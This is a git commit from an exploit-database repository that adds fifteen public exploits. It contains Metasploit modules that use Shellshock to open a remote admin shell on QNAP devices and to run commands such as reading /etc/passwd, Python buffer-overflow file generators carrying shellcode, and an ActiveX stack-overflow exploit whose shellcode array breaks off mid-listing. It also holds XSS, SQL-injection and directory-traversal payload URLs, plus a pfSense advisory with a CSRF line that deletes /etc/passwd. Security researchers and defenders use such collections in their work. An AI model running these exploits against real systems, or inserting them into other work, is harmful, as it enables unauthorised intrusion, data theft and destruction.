DB: 2015-03-27

15 new exploits
This commit is contained in:
Offensive Security 2015-03-27 08:35:40 +00:00
parent 3ab5d7365a
commit 0078b8567a
16 changed files with 576 additions and 0 deletions

View file

@ -32909,3 +32909,18 @@ id,file,description,date,author,platform,type,port
36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0
36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
36491,platforms/windows/remote/36491.txt,"Adobe Flash Player Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
36492,platforms/php/webapps/36492.txt,"GraphicsClone Script 'term' parameter Cross-Site Scripting Vulnerability",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-01-04,"Mesut Timur",php,webapps,0
36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 'login.php' Script Cross Site Scripting Vulnerability",2012-01-04,"Gjoko Krstic",php,webapps,0
36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 'status' Parameter SQL Injection Vulnerability",2011-12-29,SiteWatch,php,webapps,0
36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 'SERVER[php_self]' Cross Site Scripting Vulnerability",2011-12-29,SiteWatch,php,webapps,0
36497,platforms/php/webapps/36497.txt,"UBB.threads 7.5.6 'Username' Field Cross Site Scripting Vulnerability",2012-01-04,sonyy,php,webapps,0
36498,platforms/php/webapps/36498.txt,"Yaws 1.88 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0
36499,platforms/php/webapps/36499.txt,"StatIt 4 'statistik.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0
36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 Directory Traversal Vulnerability",2012-01-05,demonalex,windows,remote,0
36501,platforms/windows/local/36501.py,"Mini-stream Ripper v2.7.7.100 Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0
36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0
36503,platforms/hardware/remote/36503.rb,"QNAP admin shell via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,9993
36504,platforms/hardware/remote/36504.rb,"QNAP Web Server Remote Code Execution via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,0
36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0
36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,119 @@
# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##
require 'msf/core'
require 'net/telnet'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::CommandShell
def initialize(info = {})
super(update_info(info,
'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection',
'Description' => %q{
This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.
Affected products:
All Turbo NAS models except TS-100, TS-101, TS-200
},
'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
'License' => MSF_LICENSE,
'References' => [
['CVE', '2014-6271'], #aka ShellShock
['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
],
'Platform' => ['unix']
))
register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; /usr/bin/id"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
vprint_error("Connection failed")
return Exploit::CheckCode::Unknown
end
if !res
return Exploit::CheckCode::Unknown
elsif res.code== 302 and res.body.include? 'uid'
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit_telnet()
telnetport = datastore['LTELNET']
print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
print_status("#{rhost}:#{rport} - Sending exploit")
begin
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
if sock
print_good("#{rhost}:#{rport} - Backdoor service spawned")
add_socket(sock)
else
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned")
end
print_status "Starting a Telnet session #{rhost}:#{telnetport}"
merge_me = {
'USERPASS_FILE' => nil,
'USER_FILE' => nil,
'PASS_FILE' => nil,
'USERNAME' => nil,
'PASSWORD' => nil
}
start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
rescue
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled")
end
return
end
def run
begin
telnetport = datastore['LTELNET']
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &"
})
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
Rex::HostUnreachable => e
fail_with(Failure::Unreachable, e)
ensure
disconnect
end
exploit_telnet()
end
end

View file

@ -0,0 +1,85 @@
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',
'Description' => %q{
This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.
Affected products:
All Turbo NAS models except TS-100, TS-101, TS-200
},
'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
'License' => MSF_LICENSE,
'References' => [
['CVE', '2014-6271'], #aka ShellShock
['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
],
'Platform' => ['unix']
))
register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd'])
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; /usr/bin/id"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
vprint_error("Connection failed")
return Exploit::CheckCode::Unknown
end
if !res
return Exploit::CheckCode::Unknown
elsif res.code== 302 and res.body.include? 'uid'
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def run
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; #{datastore['CMD']}"
})
if res.body.empty?
print_error("No data found.")
elsif res.code== 302
print_status("#{rhost}:#{rport} - bash env variable injected")
puts " "
print_line(res.body)
end
end
end

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/51258/info
GraphicsClone Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/search/?term=<script>alert(document.cookie)</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51260/info
Orchard is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
Orchard 1.3.9 is vulnerable; other versions may be affected.
http://www.example.com/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fwww.netsparker.com%3f

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51261/info
Limny is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Limny 3.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin/login.php/"/><script>alert(&#039;zsl&#039;)</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51273/info
Pligg CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Pligg CMS 1.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/Audits/CMS/pligg_1.1.2/search.php?adv=1&status='and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51274/info
Pligg CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Pligg CMS 1.1.4 is vulnerable; other versions may also be affected.
http://www.example.com/demo/search/')%7B%7Dalert('xss');if('

15
platforms/php/webapps/36497.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/51275/info
UBB.threads is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
UBB.threads 7.5.6 is vulnerable; other versions may also be affected.
The following exploit data is available:
http://www.example.com/forums/ubbthreads.php/ubb/login/lostpw/1
POST /forums/ubbthreads.php
ubb=start_page&Loginname=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&Email=&buttforgot=I+forgot+my+password

12
platforms/php/webapps/36498.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/51276/info
Yaws is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.
Yaws 1.88 is vulnerable; other versions may be affected.
http://www.example.com/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/editPage.yaws?node=home

16
platforms/php/webapps/36499.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/51280/info
StatIt is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
StatIt 4 is vulnerable; other versions may be affected.
The following example URIs are available:
http://www.example.com/statit4/statistik.php?st_id=1&action=stat_last%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&enc=333263120212292&agent=ari/534.30&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace&PHPSESSID=14d0f57363caf5ef2d7fb1b56238dace
http://www.example.com/statit4/statistik.php?action=stat_tld&st_id=1&show=more%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E\&PHPSESSID=d8679fc904017bdf6b09f5d88f7cf979
http://www.example.com/statit4/statistik.php?action=stat_abfragen&st_id=1&show=more&order=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&sort=1&PHPSESSID=698bf9d1e988e3af70022f1dfb86fd33

105
platforms/php/webapps/36506.txt Executable file
View file

@ -0,0 +1,105 @@
Advisory ID: HTB23251
Product: pfSense
Vendor: Electric Sheep Fencing LLC
Vulnerable Version(s): 2.2 and probably prior
Tested Version: 2.2
Advisory Publication: March 4, 2015 [without technical details]
Vendor Notification: March 4, 2015
Vendor Patch: March 5, 2015
Public Disclosure: March 25, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2015-2294, CVE-2015-2295
Risk Level: Medium
CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 5.4 (AV:N/AC:H/Au:N/C:N/I:N/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web interface of pfSense, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of pfSense and delete arbitrary files via CSRF (Cross-Site Request Forgery) attacks.
Successful exploitation of the vulnerabilities may allow an attacker to delete arbitrary files on the system with root privileges, steal administrators cookies and gain complete control over the web application and even the entire system, as pfSense is running with root privileges and allows OS command execution via its web interface.
1) Multiple XSS vulnerabilities in pfSense: CVE-2015-2294
1.1 Input passed via the "zone" HTTP GET parameter to "/status_captiveportal.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
https://[host]/status_captiveportal.php?zone=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
1.2 Input passed via the "if" and "dragtable" HTTP GET parameters to "/firewall_rules.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
Below are two PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup:
https://[host]/firewall_rules.php?undodrag=1&dragtable=&if=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/firewall_rules.php?if=wan&undodrag=1&dragtable%5B%5D=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
1.3 Input passed via the "queue" HTTP GET parameter to "/firewall_shaper.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
https://[host]/firewall_shaper.php?interface=wan&action=add&queue=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
1.4 Input passed via the "id" HTTP GET parameter to "/services_unbound_acls.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
https://[host]/services_unbound_acls.php?act=edit&id=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
1.5 Input passed via the "filterlogentries_time", "filterlogentries_sourceipaddress", "filterlogentries_sourceport", "filterlogentries_destinationipaddress", "filterlogentries_interfaces", "filterlogentries_destinationport", "filterlogentries_protocolflags" and "filterlogentries_qty" HTTP GET parameters to "/diag_logs_filter.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
Below are eight PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup:
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_time=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_interfaces=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_protocolflags=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_qty=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
2) Cross-Site Request Forgery (CSRF) in pfSense: CVE-2015-2295
2.1 The vulnerability exists due to insufficient validation of the HTTP request origin in "/system_firmware_restorefullbackup.php" script. A remote attacker can trick a log-in administrator to visit a malicious page with CSRF exploit and delete arbitrary files on the target system with root privileges.
The following PoC code deletes file "/etc/passwd":
https://[host]/system_firmware_restorefullbackup.php?deletefile=../etc/passwd
-----------------------------------------------------------------------------------------------
Solution:
Update to pfSense 2.2.1
More Information:
https://blog.pfsense.org/?p=1661
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23251 - https://www.htbridge.com/advisory/HTB23251 - Arbitrary file deletion and multiple XSS vulnerabilities in pfSense.
[2] pfSense - https://www.pfsense.org - The pfSense® project is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

View file

@ -0,0 +1,34 @@
#!/usr/bin/env python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Mini-sream Ripper v2.7.7.100 Local Buffer Overflow
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/43/Mini-streamRipper.exe?token=1427334864_8d9c5d7d948871f54ae14ed9304d1ddf&fileName=Mini-streamRipper.exe
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Original POC:
# http://www.exploit-db.com/exploits/11197/
#POC:
#IMG1:
#http://i.imgur.com/ifXYgwx.png
#IMG2:
#http://i.imgur.com/ZMisj6R.png
from struct import pack
file="crack.m3u"
junk="\x41"*35032
eip=pack('<I',0x7C9D30D7)
junk2="\x44"*4
#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
#http://www.exploit-db.com/exploits/28996/
shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
writeFile = open (file, "w")
writeFile.write(junk+eip+junk2+shellcode)
writeFile.close()

View file

@ -0,0 +1,32 @@
#!/usr/bin/env python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Related Vulnerability/ies:
# http://www.exploit-db.com/exploits/8628/
#POC:
#IMG1:
#http://i.imgur.com/87sXIj8.png
from struct import pack
file="crack.ram"
junk="\x41"*35032
eip=pack('<I',0x7C9D30D7)
junk2="\x44"*4
#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
#http://www.exploit-db.com/exploits/28996/
shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
writeFile = open (file, "w")
writeFile.write(junk+eip+junk2+shellcode)
writeFile.close()

View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/51286/info
HServer web server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Information harvested may aid in launching further attacks.
HServer 0.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/..%5c..%5c..%5cboot.ini
http://www.example.com/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdr ivers%5cetc%5chosts

View file

@ -0,0 +1,88 @@
<html>
<!--
# Exploit Title: WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (0 day)
# Date: 26th MArch, 2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
# Version: 1, 6, 42, 0
# Tested on: Windows XP SP3 (IE6/7/8)
# CVE : 2015-2097
targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll"
prototype = "Sub LoadImage ( ByVal bstrFullPath As String )"
memberName = "LoadImage"
progid = "WESPMONITORLib.WESPMonitorCtrl"
argCount = 1
For full analysis of the exploit refer
http://blog.disects.com/2015/03/webgate-edvr-manager.html
-->
<object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'>
</object>
<script>
var arg1 = "";
nops = "";
var buff = "";
for(i=0;i<268;i++)
{
arg1 += "B";
}
nseh = "\xeb\x10\x90\x90"; //jmp over addr
seh = "\x71\x47\x01\x10"; //pop pop ret addr
document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>");
for(i=0;i<200;i++)
{
nops += "\x90";
}
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
